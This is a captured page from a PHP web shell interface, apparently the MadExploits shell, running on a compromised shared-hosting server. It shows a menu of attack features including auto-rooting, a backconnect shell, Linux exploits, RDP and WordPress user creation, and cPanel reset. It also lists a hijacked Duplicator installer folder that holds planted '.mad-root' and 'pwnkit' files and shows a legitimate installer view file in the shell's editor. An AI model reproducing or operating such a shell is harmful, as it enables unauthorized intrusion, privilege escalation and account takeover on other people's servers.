Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
holistea.eu /
dup-installer /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.php
15
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
view.api.php
2.69
KB
-rw-r--r--
view.exception.php
1.41
KB
-rw-r--r--
view.help.php
43.57
KB
-rw-r--r--
view.init1.php
2.15
KB
-rw-r--r--
view.s1.base.php
54.53
KB
-rw-r--r--
view.s2.base.php
20.54
KB
-rw-r--r--
view.s2.basic.php
4.16
KB
-rw-r--r--
view.s2.cpnl.php
13.59
KB
-rw-r--r--
view.s2.dbtest.php
24.49
KB
-rw-r--r--
view.s3.php
14.94
KB
-rw-r--r--
view.s4.php
17.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.init1.php
<?php defined('ABSPATH') || defined('DUPXABSPATH') || exit; /** IDE HELPERS */ /* @var $GLOBALS['DUPX_AC'] DUPX_ArchiveConfig */ $paramsManager = DUPX_Paramas_Manager::getInstance(); ?> <!-- ========================================= VIEW: STEP 0 - PASSWORD --> <form method="post" id="i1-pass-form" class="content-form" data-parsley-validate=""> <?php $paramsManager->getHtmlFormParam(DUPX_Paramas_Manager::PARAM_CTRL_ACTION, 'ctrl-step0'); $paramsManager->getHtmlFormParam(DUPX_Paramas_Manager::PARAM_SECURE_TRY, true); ?> <input type="hidden" name="<?php echo DUPX_Security::CTRL_TOKEN; ?>" value="<?php echo DUPX_CSRF::generate('ctrl-step0'); ?>"> <div class="hdr-main"> Installer Password </div> <?php if ($paramsManager->getValue(DUPX_Paramas_Manager::PARAM_SECURE_TRY)) : ?> <div class="error-pane"> <p>Invalid Password! Please try again...</p> </div> <?php endif; ?> <div style="text-align: center"> This file was password protected when it was created. If you do not remember the password check the details of the package on the site where it was created or visit the online FAQ for <a href="https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-030-q" target="_blank">more details</a>. <br/><br/><br/> </div> <div class="i1-pass-data"> <?php $paramsManager->getHtmlFormParam(DUPX_Paramas_Manager::PARAM_SECURE_PASS); ?> <div class="footer-buttons" > <div class="content-left"> </div> <div class="content-right" > <button type="button" name="secure-btn" id="secure-btn" class="default-btn" onclick="DUPX.checkPassword()">Submit</button> </div> </div> </div> </form> <script> /** * Submits the password for validation */ DUPX.checkPassword = function () { var $form = $('#i1-pass-form'); $form.parsley().validate(); if (!$form.parsley().isValid()) { return; } $form.submit(); } </script> <!-- END OF VIEW INIT 1 -->
Close